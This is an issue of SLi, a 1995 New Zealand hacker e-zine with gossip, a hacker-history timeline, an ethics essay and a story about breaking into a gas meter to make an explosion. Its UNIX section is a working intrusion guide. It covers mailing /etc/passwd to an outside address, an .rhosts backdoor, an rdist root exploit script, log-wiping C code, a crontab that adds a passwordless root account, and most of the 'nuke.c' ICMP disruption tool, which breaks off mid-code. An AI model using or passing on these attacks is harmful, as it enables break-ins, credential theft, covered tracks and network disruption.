[ 01/04/95 SLi] SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Welcome ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Well, amazing! SLi IV. Let's see if we can keep this up. If you want a letter to the editor or something like that in here, send it (or any comments, etc.. ) to: SLi PO Box 3030 Onekawa Napier New Zealand OR Internet E-mail Address: HACKER_M@IX.WCC.GOVT.NZ OR Call SLi BBS if you can find where it is Please read SLi I, II & III if you have trouble with any terms in this mag. SLi mag written by New Zealanders for New Zealanders! Oh, before I forget, we have a NEW editor (I'm still here tho'). CyntaxEra is now a Co-Editor and designer of the mag. It's outlay and overall presentation is her domain, well unless I get bossy. . [ 01/04/95 SLi] I N D E X --------- Welcome ........................... Eon The Rules ......................... Eon Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra The Police ........................ Eon Time Line ......................... Eon Books 2 Read ...................... SLi [In]Famous Quotes ................. Eon Honour ............................ Eon Unix .............................. Compiled by Eon Busted 4 Nothing .................. Eon/Cyntaxera The SLi Archive Subject list ...... Eon Fake Mail ......................... Eon Elements of Data Deprotection ..... Thorium Review: 'ToT' ..................... CyntaxEra SLi ............................... Eon COCOT Phreaking in NZ ............. CyntaxEra SmYte List ........................ SLi Editors Knotez .................... Eon . SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ The Rules ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Okay, here are the rules for the SLi mag. The entire mag is (C)opyright 1995 SLi (1) If you are working for a business that has some interest in the information contained in this mag, you must send WRITTEN notification that you are in possession of this [or any of the other SLi mags] to the following address: SLi-Comp PO Box 3030 Onekawa Napier New Zealand Enclose your name, your company's name, address, and phone/fax number. If you send an IBM formatted 720 disk and a SASE, we will send you the next SLi mag. A donation of $5 is asked for however - as YOU can aford it (unlike SOME of our readers). (2) This mag may not be edited, and no SINGULAR part may be quoted in any way! However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be expected to be paid to the following address BEFORE any such reproduction. SLi-Payment PO Box 3030 Onekawa Napier New Zealand Enclose your name, your company's name, address, and phone/fax number. The fee must be paid in $CASH$. I, the editor, reserve the right to revoke your rights to reproduce this mag at ANY time. You may, if you are NOT a company, business or in anyway connected to law enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies for no charge. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. 'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed we've managed to get out another issue before anything drastic had happened to restrict our printing, but even so, tough. Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the last issue..).. Greetz go out to: [in absolutely NO order at all..] SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead, motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS, DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent, UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX, UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro, qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby - (where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d, Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt. [..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry - maybe all that p0t actually HAS gone to my head.. ugh. ;)] Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which means that there isn't much to talk about.. oh yeah... CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =) Doesn't that show how little there is to say this time round?! Uh, I guess I could beg and plead for pieces of gossip to head our way (yup, even BBS ads will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em.. Well, if there's enuf submitted, that is..).. Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as HONEST as I could be without being TOO cutting (I got told I was a little harsh with the comments, but I felt that they were appropriate - it's only an opinion so don't take it personally.. =) ). Well, to you other readerz out there who aren't in ToT, give it a read - you may find it amusing.. =) Oh, it's a pity that I've been informed that ToT#2 was going to be the last issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we hadn't really started out TOO magnificently* Mind you... it was a start]. Telco seems to be backing down for a bit, but that doesn't mean that they've stopped 'investigating' 'n' stuff, but at least they're giving us a break! =) [Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she says. She's a nice woman - just a bit slY WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude ISNT. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR] Special note to "THE FLY" - You've pissed me off once too often, and after hearing of your comments, you'll get what's coming for you. Oh, and I'm sure you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were doing a bit of a crackdown on fone-phreaks and your name popped up somehow. Pity they're too far away to seriously do something about it - don't think they could be bothered, huh? That's about it from me.. for now 'Till next issue (well, next article anyway.. ;) )... over and OUT. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ The Police ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. -The Police- Ahh, now, this is a laugh and it was VERY boring, but here goes anyway... We ALL know police, dont we? Now, I thought that police were there to pro- tect, BUT.... It all happened one EARLY morning - about 5am. We were, uh, well, breaking into a gas-meter to get some gas to fill a rubbish bag with to make a bit of a large explosion somewhere in the metropoliton area. Now, sadly :( me and another individual were smacking the shit outta this gas meter's pipes and we hear a car driving towards where we were. We [by the way, we were in a car - not at that moment, obviously] dropped the crowbar [thats what we were talking to the gas-meter with] and hid behind the car. Unfortunatly, the police had seen us, so I [holdin' a spanner] tried to look like we were undoing the wheel [There was a stone in it. Well, that was the story anyway]. Now, the cops asked us questions, searched our car for drugs and basicly harrassed us until EXACTLY 6:30am [it mighta been 5:30am]. Anyway, I was informed that that is the EXACT time the police go home, so all we were was a 'time-waster'. I must admit that I have lost some respect I had for the boys/'girl-boys' in blue. The car-driver's mom got called and he got in shit. We had to walk back and pick up the crowbar we had left 'hidden in plain sight' - they some- how managed to miss it - and basically, we had a really bad day [morning]... BTW - Cops ask really STUPID questions! Cop: Why is there broken glass near that car?? Me: I dunno, but if you were a _real_ detective, you would notice that the broken glass is nowhere near the broken window. Obviously the car has been moved since the glass was broken so we CAN'T have done it. Cop: You ever had a run in with us before? Me: [thinking] What a fucking stupid question to ask! I told you my name so why don't you just look it up? [saying] Just the usual - being out late and getting stopped. Nothing really. Cop from Vice squad: Been smoking any dak? [dak = pot/green plant/cannibis ] A friend: I wish. Well, I have no problems with police, except that _SOME_ policewomen have a really bad attitude and that some policemen thing that they are god's gift to the world. But, the police do a job that MUST be done. I salute them for it... BUT, Mr/Ms Police Officer, take my advice and do what is right- eous and just not necessarally what is legal. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ TIME LINE ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Well, here we have it. A timeline of events in the H/P world. Now, I might have screwed up a few things so please no mail bombs and bear with me. Information and Dates have been taken from: "The Hacker Crackdown" ---- Bruce Sterling "THEFT OF COMPUTER SOFTWARE ____ William J. Cook, A NATIONAL SECURITY THREAT" Assistant U.S. Attorney PGP DOX ---- Author Unknown at time of Publication. "The History of LOD/H ____ Revision #3 May 1990" Lex Luthor U.S. Newswire ---- Author Unknown at time of Articles Publication. News Artical ____ Barbara E. McMullen and Pump-Con Bust John F. McMullen -03/11/1992- and finally, my own knowlege. KEY: Okay, the only major thing I should explain is, the use of "Sometime." and "Sometime?". A question mark means I'm not sure WHEN it happened in that year. A "." means I'm not sure of which month things happened, but it was in this order. -=[ Our History ]=- 1865: U.S. Secret Service (USSS) founded. 1876: Alexander Graham Bell invents telephone. 1878: First teenage males flung off phone system by enraged authorities. 1939: "Futurian" science-fiction group raided by Secret Service. 1971: Yippie phone phreaks start YIPL/TAP magazine. 1972: *Ramparts* magazine seized in blue-box rip-off scandal. 1978: Ward Christenson and Randy Suess create first personal computer bulletin board system. 1982: William Gibson coins term "cyberspace." 1982: "414 Gang" raided. 1983-1984: AT&T dismantled in divestiture. 1984: Congress passes Comprehensive Crime Control Act giving USSS jurisdiction over credit card fraud and computer fraud. 1984: the U.S. Department of Commerce placed expanded export controls on computer software as part of its general protection of technical data deemed vital to the national defense and security of the United States. 1984: "Legion of Doom" formed. January. "PLOVERNET" went online. [A H/P BBS] Sometime? "LOD BBS" goes online. Sometime? Groups such as "Fargo 4A" and "Knights of Shadow" form. Sometime May?. "KOS" breaks up. 1984: *2600: The Hacker Quarterly* founded. 1984: *Whole Earth Software Catalog* published. 1985: First police "sting" bulletin board systems established. 1985: Whole Earth eLectronic Link computer conference (WELL) goes on-line. 1986: Computer Fraud and Abuse Act passed in USA. 1986: Electronic Communications Privacy Act passed in US. 1987: Chicago prosecutors form Computer Fraud and Abuse Task Force. July/September. A Chicago youth attacked AT&T computers at Bell Labs in Illinois and New Jersey, at a NATO missile support site in North Carolina, and at Robbins Air Force Base. 1988: July. Secret Service covertly videotapes "SummerCon" hacker convention. September. "Prophet" cracks BellSouth AIMSX computer network and downloads E911 Document to his own computer and to Jolnet. September. AT&T Corporate Information Security informed of Prophet's action. October. Bellcore Security informed of Prophet's action. October. Scotland Yard arrested an English attacker who had broken into over 200 military, corporate, and university computers in the United States and Europe. November 2. A college undergraduate planted a computer virus that temporarily disabled 6,000 computers on the Internet [* The Internet Worm *] December. A search warrant filed by U.S. Customs agents in Chicago disclosed that a confederate of the Yugoslav Consul-General in Chicago was using a hacker to attack defense contractors by remote access in order to steal computerized information. According to the affidavit, the information obtained by the hacker was subsequently smuggled out of the United States in diplomatic pouches with the help of the Counsel- General. 1989: January. Prophet uploads E911 Document to Knight Lightning. February 25. Knight Lightning publishes E911 Document in *Phrack* electronic newsletter. March. It was disclosed that West German hackers sponsored by Eastern Bloc intelligence agencies had been systematically searching for classified information on Government computers throughout the United States through a weakness in a computer network at a California university. [* Pengo and Operation Equilizer *] March. A member of the Soviet military mission in Washington, DC, was arrested and expelled from the United States for attempting to obtain technical information about how U.S. Government classified information is secured in computers. April. Canada expelled 19 Soviet diplomats for wide-ranging espionage operations to obtain Canadian defense contractor information for military and commercial purposes. May. Chicago Task Force raids and arrests "Kyrie." June. "NuPrometheus League" distributes Apple Computer proprietary software. June 13. Florida probation office crossed with phone-sex line in switching-station stunt. July. "Fry Guy" raided by USSS and Chicago Computer Fraud and Abuse Task Force. July. Secret Service raids "Prophet," "Leftist," and "Urvile" in Georgia. 1990: Sometime? PGP (Pretty Good(tm) Privacy) created by Philip Zimmermann. January 15. Martin Luther King Day Crash strikes AT&T long-distance network nationwide. January 18-19. Chicago Task Force raids Knight Lightning in St. Louis. January 24. USSS and New York State Police raid "Phiber Optik," "Acid Phreak," and "Scorpion" in New York City. February 1. USSS raids "Terminus" in Maryland. February 3. Chicago Task Force raids Richard Andrews' home. February 6. Chicago Task Force raids Richard Andrews' business. February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile. February 9. Chicago Task Force arrests Knight Lightning. February 20. AT&T Security shuts down public-access "attctc" computer in Dallas. February 21. Chicago Task Force raids Robert Izenberg in Austin. March 1. Chicago Task Force raids Steve Jackson Games, Inc., "Mentor," and "Erik Bloodaxe" in Austin. May 7,8,9. USSS and Arizona Organized Crime and Racketeering Bureau conduct "Operation Sundevil" raids in Cincinnatti, Detroit, Los Angeles, Miami, Newark, Phoenix, Pittsburgh, Richmond, Tucson, San Diego, San Jose, and San Francisco. May. FBI interviews John Perry Barlow re NuPrometheus case. June/July. Mitch Kapor and Barlow found Electronic Frontier Foundation; Barlow publishes *Crime and Puzzlement* manifesto. [*The official EFF "about.eff" says EFF founded in July*] July 10. Members in LOD pleed guilty July 24-27. Trial of Knight Lightning. 1991: Sometime? US Senate Bill 266, a omnibus anti-crime bill, had an unsettling measure buried in it. If this non-binding resolution had become real law, it would have forced manufacturers of secure communications equipment to insert special "trap doors" in their products, so that the US Government can read anyone's encrypted messages. This measure was defeated after rigorous protest from civil libertarians and industry groups. March 25-28. Computers, Freedom and Privacy conference in San Francisco. May 1. Electronic Frontier Foundation, Steve Jackson, and others file suit against members of Chicago Task Force. July 1-2. Switching station phone software crash affects Washington, Los Angeles, Pittsburgh, San Francisco. July 8. MOD indictment's filed aganced MOD members Julio Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt," Mark Abene, aka. "Phiber Optik," Elias Ladopoulos, aka. "Acid Phreak," and Paul Stira, aka. "Scorpion," February. CPSR Roundtable in Washington, D.C. September 17. AT&T phone crash affects New York City and three airports. 1992: Sometime? FBI Digital Telephony wiretap proposal was introduced to Congress. It would require all manufacturers of communications equipment to build in special remote wiretap ports that would enable the FBI to remotely wiretap all forms of electronic communication from FBI offices. March 11. New York Police Department has announced the arrest of Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for the alleged crimes of Unauthorized Use Of A computer and Attempted Computer Trespass, both misdemeanors. Also arrested was Jason A. Brittain 22 in satisfaction of a State of Arizona Fugitive From Justice warrant. The arrests took place in the midst of "PumpCon". 1993: Sometime. SLi BBS goes up in NZ. March 21. SLi gets national TV coverage from TVNZ. April 16th. US Government-built encryption device, called the "Clipper" chip, containing a new classified NSA encryption algorithm. The Government is encouraging private industry to design it into all their secure communication products. The catch: At the time of manufacture, each Clipper chip will be loaded with its own unique key, and the Government gets to keep a copy. June. DC busts - A 2600 meeting is broken up by mall cops and police. 1994: March. TNO [The New Order] gets busted; Flatline BBS is raided. Sometime. Unlucky person nailed in Auckland, NZ, for around $250,000 of fone fraud concerning NZ Telecom ($200,000) and AT&T ($40,000). Sometime. Phreak in Wellington busted for beige boxing by Clear Communications, NZ. Sometime. Big Calling Card investigation in NZ - "Motley" in Sweeden is busted in conjunction with CC'z - no major charges are laid. June 10. "Deathstar" gets busted - no charges laid. August 6. "Tooph" makes front page news with his alliance conf calls - One was a call to NZ for 293 mins costing $306. Sometime. "MrPurple" busted for US$40,000 worth of conference charges. [* At time of publication, in jail =( *] Late/Early95. NZ Telecom hassles Wellington phreaks about VMB hacking. [how lame!]. 1995: January. Wellington H/P'ers hunted down by Victoria University (with a little help from local cops) 'cos someone got 'OPERATOR' on their boxes. [Yeah, wasn't 'root' but it scared 'em enuf!] Febuary 17. Hacker Busted in USA for 20.000 credit cards Kevin Mitnick aka Condor March 22. S.A.M.S.O.N meeting in Wellington, New Zealand "1. To identify interested parties in joining our proposed organisation - namely SAMSON - Software and Modem System Operators Network! 2. To establish and agree on a formal code of ethical practices for the successful running of a public BBS." [* well they will wanna shut me down, wont they! :P *] -eof- SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ [In]Famous Quotes ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. ----Eon,---Grasshopper-+-others---in--a---car---- Eon: "Let's go crash some place." Grasshopper: "I hope you meant as in sleeping." Grasshopper: "He's `Joe-average'" Eon: "He's `Joe-BELOW average'" George: "I'll lock you out of my Bulletin Board and give you twit access forever! Ahh ahahahaha!" [spoken in a voice like he had an award winning carrot up his ass] Cardinal: "Dial '111' and make a cop come." SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Honor ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Honor. For a hacker to justify his/her actions, he/she must have a guideline of rules of morals - a sense of honour. Some do, some dont, but I hope to show you what Hack/Phreak people's ethics should be, in my opinion. 1. For a start, injuring a single person; CC abuse is wrong. It is not ethical. Our fight is not against the little man or woman - our fight is against the profiteering companies and hiracial[sp?] government departments. We do not steal from the poor, and the helpless, and in a sense, that is what CC fraud is most of the time. Sure, occasionally you get some rich guy with 40 grand in his account, but those times are few and in between. Basically CC fraud is out. Beige boxing is out also, unless you're phreaking from an embassy, government department or Telecom [AT&T, Telco.. etc...] phone box. 2. You're not a anarchist [in the explosive terms]. It only gives us a bad name. 3. Destroying data, except for covering your tracks, is out. 4. Your world is that of the computer and the phone. Our world is safe from the problems of racial prejudice, sexual descrimination, descrim- inate by what someone says - not what they look like, sound like, or what there beliefs are. 5. Our word of honour is PERMANENT. If given, NEVER break it. If you do, you are no more worthy of your position in society as a murderer or a rapist. 6. Respect all others' points of view - even if it is foolish. 7. NEVER attack anything if it hasn't done anything to you. [Hmm, does that include kicking poor, little, defenseless PUPPIES!?] 8. Don't talk behind others' backs. If you want to say something, say it to their face. Only dishonourable people dont tell people what they think, but tell others instead. Remember, our war is the war that will shape the future. If we are not ever diligent, we will lose our rights as an individual - we will become nothing more than a number. Governments love numbers, as do all money making companies. Protect the little free speech and the few rights we have left. Protect them well, my brethren, for we will need it one day more than we will need anything else. Above all, our war is directed at big businesses and governments, not towards random people in our streets. Eon. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ UNIX ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS but 486's, 386's, Pentiums, and the like, can run it. SUN box's and VAX's can run it. In fact, that's the amazing thing about Unix - it's PORTABLE! Anyway, away from the dribble. I guess I'll start at the top. Basic UNIX username/password prompt: login: Password: This CAN be changed. After all, with UNIX, you get the source to everything. One good thing with UNIX is that the password file is globally readable unless the system administrator has enabled a shadow password system - not standard with unix. The passwords are in: /etc/passwd Mind you this can be changed also. After all, with UNIX, you get the source to everything. A UNIX passwd file looks like this: root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh The layout may differ from UNIX's, but this is the standard layout: Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell You will notice that the second field is the password one. UNIX uses a one- way password encryption system. When you login, and type your password, it encrypts your input and compares the users password field to what you entered. If it is the same, you've got the password right. Say you want to crack the passwords. You have to do the same. Encrypt a se- quence of letters/numbers/symbols and compare them to the passsword file. Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..". What you get is a dictionary file which looks like this: autistic auto autobiography autoclave autocollimate autocorrelate autocracy autocrat autocratic autograph automat automata automate automatic The reason for this - using dictionary words - is that a LOT of people just use common words as their passwords. Having to attack "Crack" using every number/letter/symbol sequence UNIX can handle would take a LONG time. The names of some good proggies that crack these passwords are: Program Name File Name <> OS ~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~ Cracker Jack jack13.zip/jack.zip Killer Cracker kc9??.zip Useful commands to type WHENEVER you get onto ANY UNIX system: [] = Don't type - instructions * = What you type This will "type" the password file to your terminal: [open a capture if on a modem link] *cat /etc/passwd [or] *ypcat passwd This will mail you via internet with the password file: *cat /etc/passwd |mail -s passwordfile [where you want to send the file to via internet mail; ie. bloggs@some.where.com] ypcat passwd | mail -s passwordfile [where you want to send the file to via internet mail; ie.bloggs@some.where.com] Also type this: *echo + + >> ~/.rhosts This will allow you (if it's installed) for you to type: *rsh -l /bin/sh -i Okay, so that is say, the user you echoed + + on was called "bob" on lame.aol.com, you would type: *rsh lame.aol.com -l bob /bin/sh -i This might or might not work, depending on how the system is setup, but if you were on lame.aol.com, it's a reasonable bet after typing that command you would then become bob with his rights, and access to his files. Well I thought about it and decided to put some useful source in here for those interested. Okay, this piece of shell script on non-patched systems will give you root. Upload this file into a directory as . When in shell on the UNIX box type: *chmod 777 *./ */tmp/." " If a # appears, type: *whoami If it says "root" you have root on that UNIX box. NB: Because of the way this file is, where ! is wrap the nextline onto that line and delete the "!" - except for the "#!" on the first line. ---------------------------CUT----------------------------8<------------------ #!/bin/sh SUID=/tmp/." " cat <<_EOF_ > test Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh $SUID Schmod 4755 $SUID _EOF_ cat test | /usr/ucb/rdist -Server localhost rm -rf test if [ -f $SUID ]; then echo "$SUID is a setuid shell. " fi -------------------------CUT-------------------------------8<------------------ The program following will hide you on a UNIX box. It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if you are root. -------------------------CUT-------------------------------8<------------------ #include #include #include #include #include #include #include int f; void kill_tmp(name,who) char *name, *who; { struct utmp utmp_ent; if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_tmp("/etc/utmp",argv[1]); kill_tmp("/usr/adm/wtmp",argv[1]); kill_lastlog(argv[1]); printf("Zap!\n"); } else printf("Error.\n"); } -----------------------------CUT---------------------------8<------------------ When you get root, find where the crontabs are put, and type this: *cat >> /root -------------->8--------------Cuthere------------------------------------------ 0 1 * * * cp /etc/passwd /var/adm/". " 1 1 * * * chmod +w /etc/passwd 2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd 1 2 * * * mv /var/adm/". " /etc/passwd 2 2 * * * chmod -w /etc/passwd -------------->8--------------Cuthere------------------------------------------ At 1-2 AM, there will be an account called "blah" with root access every day created with no password. This will nuke the IP connection between two computers: *./nuke -------------->8--------------Cuthere------------------------------------------ /* * nuke.c version 1.0 04/25/92 * by Satanic Mechanic. * must be root to open raw sockets. this version will kill * almost any ip connection. * ---------------------------------------------------------------- * I strongly advise against even compiling this software. It's far * too dangerous, and the temptation may be there to do some real * damage with it. Read and learn, that's it, eh? -concerned * ---------------------------------------------------------------- * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define DEFAULT_UNREACH ICMP_UNREACH_PORT char *icmp_unreach_type[] = { "net", "host", "protocol", "port", "frag", "source", "destnet", "desthost", "isolated", "authnet", "authhost", "netsvc", "hostsvc" }; #define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *)) int resolve_unreach_type(arg) char *arg; { int i; for (i=0; i sin_family = AF_INET; if (inet_addr(host) == -1) { ent = gethostbyname(host); if (ent != NULL) { sa->sin_family = ent->h_addrtype; bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length); return(0); } else { fprintf(stderr,"error: unknown host %s\n",host); return(-1); } } return(0); } in_cksum(addr, len) /* from ping.c */ u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), * we add sequential 16 bit words to it, and at the end, fold * back all the carry bits from the top 16 bits into the lower * 16 bits. */ while( nleft > 1 ) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if( nleft == 1 ) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* * add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } int icmp_unreach(host,uhost,port,type) char *host,*uhost; int type,port; { struct sockaddr_in name; struct sockaddr dest,uspoof; struct icmp *mp; struct tcphdr *tp; struct protoent *proto; int i,s,rc; char *buf = (char *) malloc(sizeof(struct icmp)+64); mp = (struct icmp *) buf; if (resolve_host(host,&dest) <0) return(-1); if (resolve_host(uhost,&uspoof) <0) return(-1); if ((proto = getprotobyname("icmp")) == NULL) { fputs("unable to determine protocol number of \"icmp\n",stderr); return(-1); } if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) { perror("opening raw socket"); return(-1); } /* Assign it to a port */ name.sin_family = AF_INET; name.sin_addr.s_addr = INADDR_ANY; name.sin_port = htons(port); /* Bind it to the port */ rc = bind(s, (struct sockaddr *) & name, sizeof(name)); if (rc == -1) { perror("bind"); return(-1); } if ((proto = getprotobyname("tcp")) == NULL) { fputs("unable to determine protocol number of \"icmp\n",stderr); return(-1); } /* the following messy stuff from Adam Glass (icmpsquish.c) */ bzero(mp,sizeof(struct icmp)+64); mp->icmp_type = ICMP_UNREACH; mp->icmp_code = type; mp->icmp_ip.ip_v = IPVERSION; mp->icmp_ip.ip_hl = 5; mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20); mp->icmp_ip.ip_p = IPPROTO_TCP; mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr; mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr; mp->icmp_ip.ip_ttl = 179; mp->icmp_cksum = 0; tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip)); tp->th_sport = 23; tp->th_dport = htons(port); tp->th_seq = htonl(0x275624F2); mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64)); if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) { perror("sending icmp packet"); return(-1); } return(0); } void main(argc,argv) int argc; char 